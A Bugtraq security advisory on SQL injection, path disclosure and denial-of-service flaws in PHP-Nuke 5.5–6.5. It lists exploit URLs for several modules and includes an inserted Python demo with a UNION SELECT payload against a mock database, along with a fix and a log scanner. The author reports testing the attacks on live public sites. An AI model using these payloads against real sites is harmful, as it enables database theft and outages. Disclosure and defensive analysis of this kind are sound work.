Bugtraq mailing list archives

PHP-Nuke Denial of Service attack and more SQL Injections
From: Lorenzo Manuel Hernandez Garcia-Hierro <security () lorenzohgh com>
Date: 18 May 2003 10:01:30 -0000



-------
Product: PHP-Nuke
Vendor: Francisco Burzi
Versions Vulnerable:
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5 FINAL
Francisco Burzi PHP-Nuke 6.5 BETA 1
Francisco Burzi PHP-Nuke 6.5
Francisco Burzi PHP-Nuke 6.5 with all patches
Francisco Burzi PHP-Nuke 6.0 with all patches
Francisco Burzi PHP-Nuke 5.5 with all patches

Not vulnerable:
Unknown
------
DESCRIPTION:
------
New SQL injections and path disclosures in the main modules.
Note the backtick (`) that opens every injected value below. The other
known PHP-Nuke SQL injections do not use it, but here it is essential for
a successful query: the backtick is MySQL's identifier-quote character, so
an unbalanced one breaks the statement and produces the MySQL error that,
with PHP error display enabled, reveals the script path.
--------
FOUND VULNERABLE MODULES:
--------

--------
- SECTIONS (NEW)
--------
Type: SQL Injection and Path Disclosure 
*********
Exploit:  
http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR QUERY] (NEW)
-
http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR QUERY] (NEW)
-
http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR QUERY] (NEW)

--------
-AVANTGO
--------
Type: SQL Injection and Path disclosure. (NEW)
*********
Exploit: 
http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]

--------
-SURVEYS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:

http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]
-
http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]&mode=&order=0&thold=0

--------
-DOWNLOADS
--------
Type: SQL Injection and Path disclosure. (NEW)
********
Exploit:
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]
-
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]&orderby=titleD

-------------
NEW TYPE OF PHP-NUKE ATTACK IN THE DOWNLOADS MODULE (NEW)
-------------
The rating system of the Downloads module allows a possible denial of
service attack.
Exploit:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=99999999999999999999999999999999999999999999999999999999999999999999999999
When the file is rated it ends up with a rating of 238,609,298.89. This
can be used to mount a denial of service attack against the MySQL server,
or to send a very long buffer (buffer overflow, stack crash). The MySQL
server stores this value because the query errors (more characters sent
than the field allows); if the buffer sent is longer than the server
accepts, the server becomes unstable and hangs.

Exploit for SQL injection and denial of service:

http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY]

--------
- REVIEWS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Reviews&rop=showcontent&id=`[YOUR QUERY]
--------
- WEB_LINKS
--------
Type: SQL Injection (NEW) and Path disclosure.(NEW)
********
Exploit:
http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]
-
http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`[YOUR QUERY]&ratetype=num

- The Web_Links module is also affected by the possible DoS attack that I
discovered for Downloads, and by the SQL injections and buffer overflows:

Exploit:

http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?&ratinghost_name=?&rating=[DATA]

[DATA] = the arbitrary data to send (the rating points, and the field
buffer, of course).
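The pattern shared by every URL above is a numeric key (secid, artid, sid, pollID, cid, id, ratinglid, ratenum, rating) that reaches the SQL text unchecked. The following Python example is added here and is not part of the original advisory or of PHP-Nuke's code. It reproduces that flaw against a constructed in-memory SQLite database (sqlite3 honours MySQL-style backtick identifier quoting, so the leading backtick breaks the statement the same way it breaks the MySQL query behind modules.php) and shows the fix: accept only a canonical integer and bind it as a query parameter, plus a bounds check for the rating value used in the DoS variant. The table names, rows, password hash and the 1..10 rating range are assumptions made for the example.

```python
import re
import sqlite3


# Constructed stand-in for two PHP-Nuke tables (names and rows are made up
# for this example). sqlite3 accepts MySQL-style backtick identifier quoting,
# so an unbalanced backtick breaks the statement here just as in MySQL.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (artid INTEGER, secid INTEGER, title TEXT);
        CREATE TABLE authors  (aid TEXT, pwd TEXT);
        INSERT INTO articles VALUES (1, 1, 'Public article');
        INSERT INTO authors  VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db


def list_articles_vulnerable(db, secid):
    """The flaw the advisory describes: the request parameter is pasted into
    the SQL text with no escaping and no type check."""
    sql = "SELECT artid, title FROM articles WHERE secid=" + secid
    return db.execute(sql).fetchall()


def probe_vulnerable(db, secid):
    """Run the vulnerable query and report what an attacker observes: either
    'sql_error' (in MySQL, with display_errors on, this is the message that
    leaks the script path) or the rows the injected query returned."""
    try:
        return list_articles_vulnerable(db, secid)
    except sqlite3.OperationalError:
        return "sql_error"


# secid, artid, sid, pollID, cid, id, ratinglid, ratenum are all integers:
# anything that is not a short run of digits is not a legitimate value.
INT_PARAM = re.compile(r"[0-9]{1,10}")


def list_articles_hardened(db, secid):
    """Fix: validate the parameter as a canonical decimal integer, then bind
    it, so no part of the input is ever parsed as SQL."""
    if not INT_PARAM.fullmatch(secid):
        raise ValueError("secid must be a plain integer")
    return db.execute(
        "SELECT artid, title FROM articles WHERE secid=?", (int(secid),)
    ).fetchall()


def validate_rating(rating, lo=1, hi=10):
    """Bounds check for the Downloads/Web_Links rating parameter. The 1..10
    range is an assumption for this example; the point is that an oversized
    value (the advisory's 999...999 string) is rejected before it is stored
    or used in a query."""
    if not re.fullmatch(r"[0-9]{1,2}", rating):
        raise ValueError("rating must be a 1- or 2-digit integer")
    value = int(rating)
    if not lo <= value <= hi:
        raise ValueError("rating out of range")
    return value


def rejected(fn, *args):
    """True if fn raises ValueError for these arguments (used by the checks)."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(probe_vulnerable(db, "1"))                    # normal request
    print(probe_vulnerable(db, "`"))                    # sql_error
    print(probe_vulnerable(db, "0 UNION SELECT aid, pwd FROM authors"))
    print(rejected(list_articles_hardened, db, "`"))    # True
    print(rejected(validate_rating, "9" * 70))          # True
```

The UNION payload is the generic form of "[YOUR QUERY]" once the attacker has used the backtick error to confirm the injection point; the hardened function rejects it and the backtick alike before any SQL is built.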
--------
SOLUTION:
--------
- Deactivate the affected modules entirely.
- A temporary workaround for the path disclosure is to turn off error
display in php.ini (display_errors = Off). This only hides the error
messages; the injections themselves remain, so it is a WORKAROUND, not a
fix.
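Until the modules are disabled, the attack requests can at least be spotted in the web server log, even when php.ini hides the MySQL errors from the attacker. The following Python example is added here and is not part of the advisory. It scans constructed Apache access-log lines for modules.php requests whose id-style parameters (those named in the exploit URLs above) are not plain integers, or whose rating value is absurdly long, which covers both the backtick/UNION injections and the DoS variant. The log lines, IP addresses and the two-digit rating limit are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters that modules.php uses as numeric keys in the affected modules
# (taken from the exploit URLs in the advisory).
ID_PARAMS = {"secid", "artid", "sid", "pollID", "cid", "id", "ratinglid", "ratenum"}
MAX_RATING_DIGITS = 2   # assumption: a legitimate rating never needs more

# Minimal Apache/NCSA access-log parser; only the request line is needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*"'
)


def check_request(url):
    """Return (param, reason) findings for one request URL; empty if clean."""
    parts = urlsplit(url)
    if not parts.path.endswith("/modules.php"):
        return []
    findings = []
    # parse_qsl percent-decodes, so %60 becomes the backtick before we look.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key in ID_PARAMS and not re.fullmatch(r"[0-9]+", value):
            findings.append((key, "non-numeric id parameter: %r" % value[:40]))
        elif key == "rating" and (not value.isdigit() or len(value) > MAX_RATING_DIGITS):
            findings.append((key, "suspicious rating value (%d chars)" % len(value)))
    return findings


def scan_log(lines):
    """Return (ip, timestamp, param, reason) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, reason in check_request(m.group("url")):
            hits.append((m.group("ip"), m.group("ts"), param, reason))
    return hits


# Constructed sample log: one backtick probe, one normal request, one
# oversized rating, one UNION injection and one unrelated page.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/May/2003:10:01:30 +0000] "GET /modules.php?name=Sections&op=listarticles&secid=%60 HTTP/1.0" 200 812',
    '203.0.113.5 - - [18/May/2003:10:01:31 +0000] "GET /modules.php?name=Downloads&d_op=viewdownload&cid=2 HTTP/1.0" 200 4021',
    '203.0.113.5 - - [18/May/2003:10:01:32 +0000] "GET /modules.php?name=Downloads&ratinglid=7&ratinguser=x&ratinghost_name=y&rating=99999999999999999999 HTTP/1.0" 200 300',
    '198.51.100.9 - - [18/May/2003:10:02:00 +0000] "GET /modules.php?name=Surveys&pollID=3%20UNION%20SELECT%20aid,pwd%20FROM%20authors HTTP/1.0" 500 0',
    '198.51.100.9 - - [18/May/2003:10:02:05 +0000] "GET /index.php HTTP/1.0" 200 9000',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%s %s %s: %s" % hit)
```

Run it against a real access log with `scan_log(open("access_log"))`; the id-parameter rule is strict on purpose, since those fields never legitimately contain anything but digits.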
-----
WHAT CAN HAPPEN? AND NOTES
-----
Access to the PHP-Nuke database, content modification, access to private
information, and disclosure of server paths. MySQL server buffer overflow,
MySQL server hang, server hang.
-NOTES-
I tested it on phpnuke-espanol.org and it is vulnerable to all of them.
I tested it on phpnuke.org and it is vulnerable in the active modules
affected by this (Downloads, Surveys) (some errors are not reported
because php.ini is configured for that, but the vulnerabilities are
present).
-----
CONTACT INFO :
---------------------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--www.novappc.com --
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1  4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************

